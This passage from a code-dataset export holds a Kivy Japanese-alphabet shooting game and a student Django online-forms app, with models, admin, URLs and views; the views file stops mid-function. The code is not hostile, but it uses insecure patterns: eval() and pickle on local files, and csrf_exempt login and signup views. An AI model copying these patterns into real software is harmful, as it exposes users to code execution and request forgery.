#\"❤\"\nflake_shape_v=\"❃\" #\"✿\" #\"♥\", #\"❤\"\nflake_shapes=[flake_shape, flake_shape_v]\nanimation_char_type=\"in_out_quart\"\n\ntime_limit_mode=0\nchar_limit_mode=1\nlong_limit_mode=2\n\nextmap_index=-1\n\nheart_scale=[(0, 0.7 + 0),(0.15, 0.7 + 0.18), (0.30, 0.7 + 0.15),\n (0.45, 0.7 + 0),(0.60, 0.7 + 0.15), (0.75, 0.7 + 0.18),\n (0.90, 0.7 + 0),(0.60, 0.7 - 0.40), (0.75, 0.7 - 0.20),\n (0.45, 0.7-0.6),(0.30, 0.7 - 0.40), (0.15, 0.7 - 0.20)]\n\na_scale=[(0.1, 0.4),(0.1, 0.6), (0.1, 0.8),\n (0.2, 1.0),(0.3, 1.0), (0.4, 0.8),\n (0.4, 0.6),(0.4, 0.4), (0.3, 0.3),\n (0.2, 0.2),(0.45,0.3), (0.45,0.3)]\n\nk_scale=[(0.2,0.15),(0.2, 0.3), (0.2, 0.45),\n (0.2, 0.6),(0.2, 0.75), (0.2, 0.9),\n (0.5,0.15),(0.4, 0.25), (0.3, 0.35),\n (0.3, 0.6),(0.4, 0.7), (0.5, 0.8)]\n\ni_scale=[(0.3,0.2), (0.3, 0.3), (0.3, 0.4),\n (0.3,0.5), (0.3, 0.6), (0.3, 0.7),\n (0.3,0.8), (0.3, 0.95),(0.15, 0.7),\n (0.2,0.775),(0.4,0.225),(0.45, 0.3)]\n\ns_scale=[(0.1, 0.1),(0.2, 0.1), (0.3, 0.1),\n (0.4, 0.2),(0.45,0.3), (0.4, 0.4),\n (0.3, 0.5),(0.2, 0.6), (0.15, 0.7),\n (0.2, 0.8),(0.3, 0.9), (0.45, 0.9)]\n\nhelp_info=\\\n\"\"\"\nHelp:\n1. system commands: help, exit, setup, ... (you can type once the app starts)\n * help: it comes to this page\n * exit: close the window\n * setup: you would be able to see a textinput box:\n Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\n 60, 0, 0, 1, 1, 30, 5, 6\n - Time: 1-n => the certain time, see Mode 0\n - Alphabet: 0 => hiragana 1 => katakana 2 => kanji\n -1 => load the user-defined map from \"\"\"+extmap_path+\"\"\"\n - Mode: 0 => count the character number in a certain time\n 1 => count the time after you finish all characters\n 2 => shoot all before any flakes touch the bottom\n - Cheat: 0 => disable the prompt by clicking the flakes\n 1 => enable the prompt by clicking the flakes\n - Speed: 1-n => flakes fall faster as the value gets bigger\n - FontSize: 1-n => the font size on each flake\n - Delay: 0 => no animation delay, shoot extremely fast\n 1-n => the animation duration for shooting\n - Flakes:1-n => the number of the Flakes\n * ...: others would be matched with the flakes\n2. clicks: on-flakes, on-bullet\n * on-flakes: show the prompt if Cheat is enabled\n * on-bullet: it comes to this page, as help cmd does\n\nCopyright:\n Powered By : Xin Long <[email protected]>\n Source Code : https://github.com/lxin/jptest\n\"\"\"\nclass JPTest(App, Widget):\n def get_conf_flakes(self): return self.confs[7]\n def get_conf_delay(self):\n if self.get_conf_char() == 2: # important to author\n return random.randint(10, 20)\n return self.confs[6]\n\n def get_conf_fsize(self): return self.confs[5]\n def get_conf_speed(self): return self.confs[4]\n def get_conf_prompt(self): return self.confs[3]\n def get_conf_mode(self): return self.confs[2]\n def get_conf_char(self): return self.confs[1]\n def get_conf_time(self): return self.confs[0]\n\n def get_conf_all(self):\n return ', '.join([str(i) for i in self.confs])\n\n def get_stat_stime(self): return self.stats[0]\n def get_stat_pass(self): return self.stats[1]\n def get_stat_fail(self): return self.stats[2]\n def get_stat_ctime(self): return self.stats[3]\n\n def set_stat_stime(self, val): self.stats[0] = val\n def set_stat_pass(self, val): self.stats[1] = val\n def set_stat_fail(self, val): self.stats[2] = val\n def set_stat_ctime(self, val): self.stats[3] = val\n\n def get_stat_all(self):\n return 'Time: {}, Pass: {}, Fail: {}'.format(self.get_stat_ctime(),\n self.get_stat_pass(), self.get_stat_fail())\n\n def keyboard_closed(self):\n pass\n\n def on_window_resize(self, window, width, height):\n self.reset_stats(True)\n\n def setup_press(self, instance):\n try:\n text = instance.setup_input.text\n newconfs = ()\n newconfs = tuple(int(i) for i in text.split(','))\n finally:\n if len(newconfs) != len(self.confs):\n instance.setup_input.text = self.get_conf_all()\n return\n try:\n self.confs=newconfs\n pickle.dump(self.confs, open(conf_path,'wb'))\n finally:\n self.reset_stats(instance)\n\n def reset_widgets(self, instance = None):\n self.win_width = Window.size[0]\n self.win_height = Window.size[1]\n\n self.popup_font_size= self.win_width / 53\n self.flake_font_size= self.win_width / 53 # not used\n self.label_font_size= self.win_width / 80\n self.input_font_size= self.win_width / 45\n self.help_font_size= self.win_height/ 60\n self.box_padding= self.win_width / 160\n self.box_input_padding= self.win_width / 80\n\n for widget in self.layout.walk(restrict=True):\n self.layout.remove_widget(widget)\n\n self.layout.add_widget(Image(source=bg_img, allow_stretch=True))\n self.buttons = []\n for i in range(self.get_conf_flakes()):\n bullet = self.create_bullet()\n button = self.create_flake(i, bullet)\n button.index = i\n self.layout.add_widget(bullet)\n self.layout.add_widget(button)\n\n self.layout.add_widget(self.create_bullet(bt_img))\n self.layout.add_widget(self.create_cmdline())\n\n def reset_stats(self, instance = None):\n self.stats=[time.time(), 0, 0, self.get_conf_time()]\n try:\n if self.get_conf_char() == extmap_index:\n newmap = eval(open(extmap_path,'rb').read())\n else:\n newmap = jp_maps[self.get_conf_char()]\n except:\n newmap = {}\n self.jp_map=copy.deepcopy(newmap)\n\n self.no_keys=0\n self.heart_bullet = 0\n if not instance:\n return True\n\n if self.popup:\n self.popup.dismiss()\n self.popup=None\n\n self.sounds[2].play()\n self.reset_widgets()\n\n\n def close_window(self, instance):\n self.stop()\n\n def on_keyboard_down(self, keyboard, keycode, text, modifiers):\n if self.popup:\n return True\n\n if (keycode[1] == 'enter'):\n if self.textinput.text == \"exit\":\n self.stop()\n return True\n if self.textinput.text == \"help\":\n self.help_press()\n return True\n if self.textinput.text == \"setup\":\n self.confs_press()\n return True\n\n for b in self.buttons:\n if (self.textinput.text == b.kv_key or (('_') in b.kv_key and \\\n self.textinput.text == b.kv_key.split('_')[1])) and b.opacity:\n if self.get_conf_delay():\n b.bullet.background_color = b.background_color\n b.bullet.text = self.textinput.text\n self.animate_bullet(b.bullet)\n else:\n self.sounds[0].play()\n b.opacity = 0\n\n self.set_stat_pass(self.get_stat_pass() + 1)\n self.textinput.text=\"\"\n return True\n\n self.set_stat_fail(self.get_stat_fail() + 1)\n self.sounds[1].play()\n self.textinput.text=\"\"\n return True\n\n if not self.textinput.focus:\n self.textinput.focus=True\n if keycode[0] < 256:\n self.textinput.text+=chr(keycode[0])\n return True\n\n return True\n\n def animate_flake_restart(self, animation, instance):\n if instance not in self.buttons:\n return True\n\n if instance.opacity == 0:\n instance.opacity = 1\n self.set_random_char(instance)\n\n instance.pos[1]=self.win_height # width should be updated and size more !\n self.animate_flake(instance)\n\n if self.popup:\n return True\n\n time_gap = int(time.time() - self.get_stat_stime())\n if (self.get_conf_mode() == char_limit_mode and self.no_keys >= self.get_conf_flakes()) \\\n or (self.get_conf_mode() == long_limit_mode and instance.opacity == 1) \\\n or ( self.get_conf_mode() == time_limit_mode and time_gap >= self.get_stat_ctime()):\n self.set_stat_ctime(time_gap)\n else:\n if self.get_conf_char() == 2: # important to author\n if self.heart_bullet >= 100 and self.heart_bullet <= 112:\n if self.heart_bullet == 100:\n for b in self.buttons:\n if not b.opacity:\n return True\n for b in self.buttons:\n if self.get_conf_delay():\n b.bullet.background_color = b.background_color\n b.bullet.text = flake_shape\n self.animate_bullet(b.bullet)\n self.heart_bullet += 1\n\n if self.heart_bullet or self.get_conf_flakes() != 12:\n return True\n\n self.heart_bullet = 1\n for b in self.buttons:\n b.bullet.background_color = b.background_color\n b.bullet.text = flake_shape_v\n self.animate_heart_bullet(b.bullet)\n\n return True\n\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding))\n box.add_widget(Label(text = self.get_stat_all(), size_hint=(1, 0.4)))\n box.add_widget(Button(text = \"restart\", size_hint=(1, 0.3), on_press=self.reset_stats))\n box.add_widget(Button(text = \"exit\", size_hint=(1, 0.3), on_press=self.close_window))\n self.popup = Popup(title='Result', title_size= self.popup_font_size, title_align = 'center', auto_dismiss = False,\n content = box, size_hint=size_hint, size=(self.win_width / 3, self.win_height / 3))\n self.popup.open()\n self.sounds[2].stop()\n\n def animate_heart_bullet_x_complete(self, animation, instance): # important to author\n instance.text = flake_shape\n self.animate_bullet_x(instance)\n\n def animate_heart_bullet_x(self, animation, instance): # important to author\n animation = Animation(pos=instance.pos)\n index = (instance.button.index + 1) % 12\n animation += Animation(pos=self.buttons[index].bullet.pos, duration=5, t=\"out_circ\")\n animation.bind(on_complete=self.animate_heart_bullet_x_complete)\n animation.start(instance)\n\n def animate_heart_bullet(self, instance): # important to author\n animation = Animation(pos=instance.pos)\n pos_scale = tuple(i*2/3 for i in s_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=2, t=animation_char_type)\n\n pos_scale = tuple(i/2 for i in a_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = tuple(i*2/3 for i in k_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width*2/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = tuple(i/2 for i in i_scale[instance.button.index])\n pos = (pos_scale[0] * self.win_height + self.win_width*3/4,\n pos_scale[1] * self.win_height - self.win_height / 24 + self.win_height/5)\n animation += Animation(pos=pos, duration=1.5, t=animation_char_type)\n\n pos_scale = heart_scale[instance.button.index]\n pos = (pos_scale[0] * self.win_height*2/5,\n pos_scale[1] * self.win_height *2/5 + self.win_height/5)\n animation += Animation(pos=pos, duration=2, t=\"out_bounce\")\n\n pos_scale = heart_scale[instance.button.index]\n pos_offset = heart_scale[6][0] * self.win_height\n pos = (pos_scale[0] * self.win_height + (self.win_width - pos_offset - self.win_height / 24),\n pos_scale[1] * self.win_height)\n animation += Animation(pos=pos, duration=2, t=animation_char_type)\n animation.bind(on_complete=self.animate_heart_bullet_x)\n animation.start(instance)\n\n def animate_flake_duration(self):\n if self.get_conf_mode() == long_limit_mode:\n return random.randint(12, 24) / self.get_conf_speed()\n\n return random.randint(6, 12) / self.get_conf_speed()\n\n def animate_flake(self, instance):\n instance.text=instance.kv_value # for prompt enabled\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=(instance.pos[0], 0 - instance.size[0]),\n duration=self.animate_flake_duration())\n\n animation.bind(on_complete=self.animate_flake_restart)\n animation.start(instance)\n\n def animate_bullet_complete(self, animation, instance):\n instance.background_color=bullet_color\n instance.button.opacity = 0\n instance.pos=(self.win_width / 2 - self.win_width / 80,\n self.win_height / 24)\n instance.text=\"\"\n self.sounds[0].play()\n\n def animate_bullet_xx_complete(self, animation, instance): # important to author\n if instance.button not in self.buttons:\n return True\n\n self.heart_bullet = 100\n instance.background_color=bullet_color\n instance.text=\"\"\n\n def animate_bullet_x_complete(self, animation, instance): # important to author\n instance.button.opacity = 0\n self.sounds[0].play()\n animation = Animation(pos=instance.pos)\n pos=(self.win_width / 2 - self.win_width / 80, self.win_height / 24)\n animation += Animation(pos=pos, duration=1.5, t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_xx_complete)\n animation.start(instance)\n\n def animate_bullet_x(self, instance): # important to author\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=instance.button.pos, duration=1, t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_x_complete)\n animation.start(instance)\n\n def animate_bullet(self, instance):\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=instance.button.pos,\n duration=float(self.get_conf_delay()/10), t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_complete)\n animation.start(instance)\n\n def help_return(self, instance = None):\n self.popup.dismiss()\n self.popup=None\n\n def help_press(self, instance = None):\n self.textinput.text=\"\"\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding)) # padding fix\n setup_label = Label(text = help_info, line_height = 1.2,\n size_hint=(1, 0.9), font_size=self.help_font_size, font_name=help_font)\n setup_button = Button(text = \"return\", size_hint=(1, 0.1), on_press = self.help_return)\n box.add_widget(setup_label)\n box.add_widget(setup_button)\n self.popup = Popup(title='Information', title_size = self.popup_font_size,\n title_align = 'center', content = box, auto_dismiss = False,\n size_hint=size_hint, size=(self.win_width * 3 / 4, self.win_height * 9 / 10))\n self.popup.open()\n return True\n\n def confs_press(self, instance = None):\n self.textinput.text=\"\"\n self.sounds[2].stop()\n\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding))\n setup_label = Label(text = \"Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\",\n size_hint=(1, 0.4), font_size=self.label_font_size)\n setup_input = TextInput(text=self.get_conf_all(), multiline=False, padding = (self.box_input_padding),\n size_hint=(1, 0.3), font_size=self.input_font_size)\n setup_button = Button(text = \"setup\", size_hint=(1, 0.3), on_press = self.setup_press)\n setup_button.setup_input = setup_input\n box.add_widget(setup_label)\n box.add_widget(setup_input)\n box.add_widget(setup_button)\n self.popup = Popup(title='Perference', title_size = self.popup_font_size,\n title_align = 'center', content = box, auto_dismiss = False,\n size_hint=size_hint, size=(self.win_width * 2 / 5, self.win_height * 2 / 5))\n self.popup.open()\n\n return True\n\n def button_press(self, instance):\n if not self.get_conf_prompt():\n return True\n\n if instance.text == instance.kv_value:\n if self.get_conf_char() == 2 and '_' in instance.kv_key: # important to author\n instance.text = instance.kv_key.split('_')[1]\n else:\n instance.text=instance.kv_key\n else:\n instance.text=instance.kv_value\n\n def set_random_char(self, button):\n keys=list(self.jp_map.keys())\n if not keys:\n if self.get_conf_char() == 2: # important to author\n value = flake_shape\n key=random.choice([\":D\", \";)\", \":P\", \"O.o\", \"\\o/\", \"^0^\", \">\\\"<\", \":)\", \"<3\"])\n else:\n value = flake_shapes[self.get_conf_char()%2]\n key = flake_shapes[(self.get_conf_char() + 1)%2]\n self.no_keys += 1\n button.text = value\n button.kv_key = key\n button.kv_value = value\n return True\n\n if self.get_conf_char() == 2: # important to author\n keys=list(sorted(self.jp_map.keys()))\n key=keys[0]\n else:\n key = random.choice(keys)\n val = self.jp_map[key]\n\n if self.get_conf_mode() == char_limit_mode or \\\n self.get_conf_char() == 2: # important to author\n self.jp_map.pop(key)\n\n button.text = val\n button.kv_key = key\n button.kv_value = val\n return True\n\n def create_flake(self, i, bullet):\n width = self.win_width / (3 * self.get_conf_flakes() - 2)\n button = Button(font_name=font_name, font_size=dp(self.get_conf_fsize()),\n pos=(width * 3 * i, self.win_height), \\\n background_color=flake_colors[i%6], on_press=self.button_press,\n size_hint=size_hint, size = (width, width))\n self.set_random_char(button)\n\n button.bullet = bullet\n bullet.button = button\n\n self.animate_flake(button)\n self.buttons.append(button)\n return button\n\n def create_bullet(self, bt_img = None):\n bullet = Button(size_hint=size_hint, size=(self.win_height / 24, self.win_height / 24),\n font_name=font_name, pos=(self.win_width / 2 - self.win_width / 80,\n self.win_height / 24), background_color=bullet_color)\n if not bt_img:\n return bullet\n\n bbl = StackLayout(size=bullet.size, pos=bullet.pos)\n img = Image(source=bt_img)\n bbl.add_widget(img)\n bullet.add_widget(bbl)\n\n bullet.bind(on_press=self.help_press)\n return bullet\n\n def create_cmdline(self):\n textinput = TextInput(pos=(self.win_width / 2 - self.win_width / 80, self.win_height / 120),\n size_hint=size_hint, size=(self.win_width / 8, self.win_height / 24),\n multiline=False, background_color=(0,0,0,0), foreground_color=(0,0,0,1))\n self.textinput = textinput\n\n return self.textinput\n\n def create_keyboard(self):\n self._keyboard = Window.request_keyboard(self.keyboard_closed, self)\n self._keyboard.bind(on_key_down=self.on_keyboard_down)\n Window.bind(on_resize=self.on_window_resize)\n\n def create_sounds(self):\n self.sounds.append(SoundLoader.load(shot_sound))\n self.sounds.append(SoundLoader.load(miss_sound))\n self.sounds.append(SoundLoader.load(bg_sound))\n self.sounds[2].loop=True\n self.sounds[2].play()\n\n def init_window(self):\n self.title = title\n self.textinput=None\n self.sounds=[]\n self.popup=None\n self.reset_stats()\n\n def load_confs(self):\n self.confs=confs\n if os.path.exists(conf_path):\n newconfs = pickle.load(open(conf_path,'rb'))\n if len(newconfs) == len(self.confs):\n self.confs = newconfs\n\n def build(self):\n self.load_confs()\n self.init_window()\n self.create_sounds()\n self.create_keyboard()\n\n self.layout = FloatLayout()\n self.reset_widgets()\n\n return self.layout\n\nif __name__ == '__main__': JPTest().run()\n" }, { "alpha_fraction": 0.5764309763908386, "alphanum_fraction": 0.5966330170631409, "avg_line_length": 44, "blob_id": "4b667969ec1bf97644af8fbe4a10a363bc486b8d", "content_id": "4c1e3a23c0aa3551006d7a4c928bb32f20704b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1485, "license_type": "no_license", "max_line_length": 77, "num_lines": 33, "path": "/README.md", "repo_name": "lxin/jptest", "src_encoding": "UTF-8", "text": "# jptest\nA kivy example for Japanese alphabet\n\nHelp:\n1. system commands: help, exit, setup, ... (you can type once the app starts)\n * help: it comes to this page\n * exit: close the window\n * setup: you would be able to see a textinput box:\n\n Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\n 60, 0, 0, 1, 1, 30, 5, 6\n\n - Time: 1-n => the certain time, see Mode 0\n - Alphabet: 0 => hiragana 1 => katakana 2 => kanji\n -1 => load the user-defined map from ~/jp_ext.map\n - Mode: 0 => count the character number in a certain time\n 1 => count the time after you finish all characters\n 2 => shoot all before any flakes touch the bottom\n - Cheat: 0 => disable the prompt by clicking the flakes\n 1 => enable the prompt by clicking the flakes\n - Speed: 1-n => flakes fall faster as the value gets bigger\n - FontSize: 1-n => the font size on each flake\n - Delay: 0 => no animation delay, shoot extremely fast\n 1-n => the animation duration for shooting\n - Flakes:1-n => the number of the Flakes\n * ...: others would be matched with the flakes\n2. clicks: on-flakes, on-bullet\n * on-flakes: show the prompt if Cheat is enabled\n * on-bullet: it comes to this page, as help cmd does\n\nCopyright:\n1. Powered By : Xin Long <[email protected]>\n2. Source Code : https://github.com/lxin/jptest\n" } ]
2
subhojeet/Online-Forms
https://github.com/subhojeet/Online-Forms
659654c7046b1f05cc2f69a95cf7f9c62cd3f261
6d311cf12d3fabad04c414755b560cd3f402c1da
dd99a9f9c9576077392cf1204c8634815e36f829
refs/heads/master
2021-01-10T03:04:32.348416
2015-09-29T18:36:21
2015-09-29T18:36:21
43,386,563
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7431507110595703, "alphanum_fraction": 0.7577054500579834, "avg_line_length": 33.32352828979492, "blob_id": "9cf54fb55c492117e9dc42f73c146ac6301394c4", "content_id": "08d3ffb8132d5912c4a57249d0180454c7fcb1fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2336, "license_type": "no_license", "max_line_length": 65, "num_lines": 68, "path": "/online_forms/models.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nclass user_table(models.Model):\n\tuser_id = models.AutoField(primary_key=True)\n\tusername = models.CharField(unique=True,max_length=100)\n\tpassword = models.CharField(max_length=100)\n\tdef __str__(self):\n\t\treturn self.username\n\nclass user_info(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tgroup = models.ForeignKey('group_table',primary_key=True)\n\tfirst_name = models.CharField(max_length=200,null=True)\n\tlast_name = models.CharField(max_length=200,null=True)\n\nclass group_table(models.Model):\n\tgroup_id = models.AutoField(primary_key=True)\n\tpermissions = models.IntegerField()\n\nclass form_table(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tform_id = models.AutoField(primary_key=True)\n\tform_permissions = models.IntegerField()\n\tdef __str__(self):\n\t\treturn str(self.form_id)\n\nclass form_object_table(models.Model):\n\tform = models.ForeignKey(form_table,primary_key=True)\n\tresponse_url = models.CharField(max_length=100,unique=True)\n\tform_url = models.CharField(max_length=100,unique=True)\n\tform_title = models.CharField(max_length=200)\n\tform_description = models.CharField(max_length=500)\n\tflag = models.BooleanField(\"Form is Active or Not\",default=True)\n\tclass Meta:\n\t\tverbose_name = 'Form'\n\t\tverbose_name_plural = 'Forms'\n\nclass elements_table(models.Model):\n\tform_object = models.ForeignKey('form_object_table')\n\telements_id = models.AutoField(primary_key=True)\n\tparent_id = models.IntegerField()\n\tInput = models.ForeignKey('input_object_table')\n\trequired = models.BooleanField(default=False)\n\tdescription = models.TextField();\n\ttitle = models.CharField(max_length=1000)\n\tpriority = models.IntegerField()\n\tdef __str__(self):\n\t\treturn str(self.elements_id)\n\nclass input_object_table(models.Model):\n\tinput_id = models.AutoField(primary_key=True)\n\tinput_type = models.CharField(max_length=100)\n\tdef __str__(self):\n\t\treturn self.input_type\n\nclass response_object_table(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tform = models.ForeignKey(form_table)\n\telements = models.ForeignKey(elements_table)\n\tresponse_string = models.TextField()\n\tresponse_time = models.DateTimeField()\n\nclass choice(models.Model):\n\telements = models.ForeignKey('elements_table')\n\tchoice_id = models.AutoField(primary_key=True)\n\tchoice_description = models.CharField(max_length=500)\n\t\n" }, { "alpha_fraction": 0.642011821269989, "alphanum_fraction": 0.642011821269989, "avg_line_length": 36.55555725097656, "blob_id": "66aa23af7b9ce7f77b71ba34d6dc383bb780be17", "content_id": "ae7d2cf4b570543edb51634ef141e2781626880c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/online_forms/urls.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns,url\n\nfrom online_forms import views;\n\nurlpatterns = patterns('',\n\t\t\turl(r'^login/$',views.login, name = 'login'),\n\t\t\turl(r'^signup/$',views.signup, name = 'signup'),\n\t\t\turl(r'^fill/(?P<form_hash>\\w+)/$',views.fill_form,name='fill'),\n\t\t\turl(r'^view/(?P<form_hash>\\w+)/$',views.view_form,name='view'))\n" }, { "alpha_fraction": 0.7359747290611267, "alphanum_fraction": 0.7377278804779053, "avg_line_length": 38.61111068725586, "blob_id": "1641cb565d17a9469e559d63fde75305f6828976", "content_id": "27654b8f057bea5d3b8bf719e3acf5353c5a5ec2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "no_license", "max_line_length": 95, "num_lines": 72, "path": "/online_forms/admin.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom online_forms.models import *\nfrom django.db.models.signals import pre_save\nfrom django.dispatch import receiver,Signal\nfrom django.http import HttpResponse, HttpRequest\nimport hashlib\nfrom nested_inlines.admin import NestedStackedInline, NestedTabularInline, NestedModelAdmin\n# Register your models here.\nclass ChoiceTypeInline(NestedStackedInline):\n\tmodel = choice\n\textra = 0\nclass ElementsShowInline(NestedStackedInline):\n\tmodel=elements_table\n\textra= 1\n\tinlines = [ChoiceTypeInline,]\n\tfieldsets = [\n\t\t('Add Elements to Form', {'fields': ['title','description','Input','required','priority']}),\n \n\t]\n\n'''\tdef save_model(self,request,obj,form,change):\n\t\tif obj.parent_id is None:\n\t\t\tobj.parent_id = obj.form_id\n\t\tobj.save()'''\n\t\t\nclass form_object_table_admin(NestedModelAdmin):\n\tfieldsets = [\n\t\t('Form', {'fields': ['form_title','form_description','flag']}),\n \n\t]\n\tinlines = [ElementsShowInline,]\n\tlist_display = ('form_title','form_description','form_response_link','form_view_link')\n\tdef form_response_link(self,obj):\n\t\treturn \"<a target='_blank' href='../../../forms/view/%s'>Click Here</a>\" % (obj.response_url)\n\tdef form_view_link(self,obj):\n\t\treturn \"<a target='_blank' href='../../../forms/fill/%s'>Click Here</a>\" % (obj.form_url)\n\tform_response_link.allow_tags = True\n\tform_response_link.short_description = 'View Your Form Response Here'\n\tform_view_link.allow_tags = True\n\tform_view_link.short_description = 'View Your Form Render Here'\n\tdef queryset(self,request):\n\t\tqs = super(form_object_table_admin,self).queryset(request)\n\t\tif request.user.is_superuser:\n\t\t\treturn qs\n\t\telse:\n\t\t\tuser_ = user_table.objects.get(username=request.user.username)\n\t\t\tform_list = form_table.objects.filter(user=user_)\n\t\t\treturn qs.filter(form__in=form_list)\n\tdef save_model(self,request,obj,form,change):\n\t\tif obj.form_id is None:\n\t\t\tuser_ = user_table.objects.get(username=request.user.username)\n\t\t\tcurr_form = form_table(user = user_ , form_permissions = 1)\n\t\t\tcurr_form.save()\n\t\t\tobj.form_id = curr_form.form_id\n\t\t\tobj.response_url = hashlib.md5(request.user.username+str(obj.form_id)).hexdigest()\n\t\t\tobj.form_url = hashlib.sha1(request.user.username+str(obj.form_id)).hexdigest()\n\t\tobj.save()\n\nadmin.site.register(user_table)\nadmin.site.register(group_table)\nadmin.site.register(user_info)\nadmin.site.register(form_object_table,form_object_table_admin)\nadmin.site.register(form_table)\nadmin.site.register(input_object_table)\nadmin.site.register(response_object_table)\n@receiver(pre_save,sender=elements_table)\ndef create_parent_per_element(sender,instance,**kwargs):\n\tif instance.parent_id is None:\n\t\tinstance.parent_id = instance.form_object.form_id\n\tpre_save.disconnect(create_parent_per_element,sender=elements_table)\n\tinstance.save()\n\tpre_save.connect(create_parent_per_element,sender=elements_table)\n" }, { "alpha_fraction": 0.7808619141578674, "alphanum_fraction": 0.782322883605957, "avg_line_length": 33.224998474121094, "blob_id": "9abefd21ef18991b67414b80d16e71cdeb954e69", "content_id": "628206ba477640484cbc08a2e52d8e44808d0bdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/main.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "import os\nimport sys\n#sys.path.append('/django')\nsys.path.append('/database_project/settings.py')\n#sys.path.append('/usr/local/lib/python2.7/dist-packages/nested_inline')\nimport logging\n# Google App Engine imports.\nfrom google.appengine.ext.webapp import util\n# A workaround to fix the partial initialization of Django before we are ready\n#from django.core.management import setup_environ\nfrom django.conf import settings\n\n#setup_environ(settings)\n#print settings.ROOT_URLCONF\nos.environ['DJANGO_SETTINGS_MODULE'] = 'database_project.settings'\n#settings._target = None\n# Import various parts of Django.\nimport django.core.handlers.wsgi\nimport django.core.signals\nimport django.dispatch.dispatcher\nimport django.db\n\ndef log_exception(*args, **kwds):\n\t\"\"\"Log the current exception.\n\tInvoked when a Django request raises an exception\"\"\"\n\tlogging.exception(\"Exception in request:\")\n\t# Log errors\n\n#django.dispatch.dispatcher.connect(log_exception,django.core.signals.got_request_exception)\n# Unregister the rollback event handler\n#django.dispatch.dispatcher.disconnect(django.db._rollback_on_exception,django.core.signals.got_request_exception)\n\ndef main():\n\t# Create a Django application for WSGI.\n\tapplication = django.core.handlers.wsgi.WSGIHandler()\n\t# Run the WSGI CGI handler with that application.\n\tutil.run_wsgi_app(application)\n\nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.7746478915214539, "alphanum_fraction": 0.7887324094772339, "avg_line_length": 34.5, "blob_id": "5dafe78b7307ae64670cfada9b13270ea88ff394", "content_id": "78d446989eccd9e3962e172adcdd88af09805be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "no_license", "max_line_length": 55, "num_lines": 2, "path": "/README.md", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "# Online-Forms\nSem 6 database project( online forms for IITG intranet)\n" }, { "alpha_fraction": 0.6887417435646057, "alphanum_fraction": 0.6964949369430542, "avg_line_length": 36.07185745239258, "blob_id": "0fe398bb0f5cea9afb7df4b9b591feb5f6193e0b", "content_id": "be6f2a402b2b5b3f8bd62831dd96d24577117e62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6191, "license_type": "no_license", "max_line_length": 142, "num_lines": 167, "path": "/online_forms/views.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import authenticate,logout\nfrom django.contrib.auth import login as login_user\nfrom django.contrib import staticfiles\nimport datetime, hashlib, json,os, random\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404\nfrom models import *\nfrom datetime import datetime\n\nimport json\n# Create your views here.\n\n@csrf_exempt\ndef login(request):\n\tif request.method == 'GET':\n\t\treturn render_to_response('login.html')\n\telse:\n\t\tif request.user.is_authenticated():\n\t\t\tlogout(request)\n\t\tuser_name = request.POST.get('email')\n\t\tuser_pass = request.POST.get('password')\n\t\t#user = user_table.objects.get( user_table__username = user_name,user_table__password = user_pass )\n\t\tuser = authenticate(username = user_name,password = user_pass)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tlogin_user(request,user)\n\t\t\t\treturn HttpResponseRedirect('../../admin/')\n\t\t\telse:\n\t\t\t\treturn render_to_response('login.html',{'errormsg':'User not active'})\n\t\telse:\n\t\t\treturn render_to_response('login.html',{'errormsg':'Invalid login'})\n\n@csrf_exempt\ndef signup(request):\n\tif request.method == 'GET':\n\t\treturn render_to_response('signup.html')\n\telse:\n\t\tif 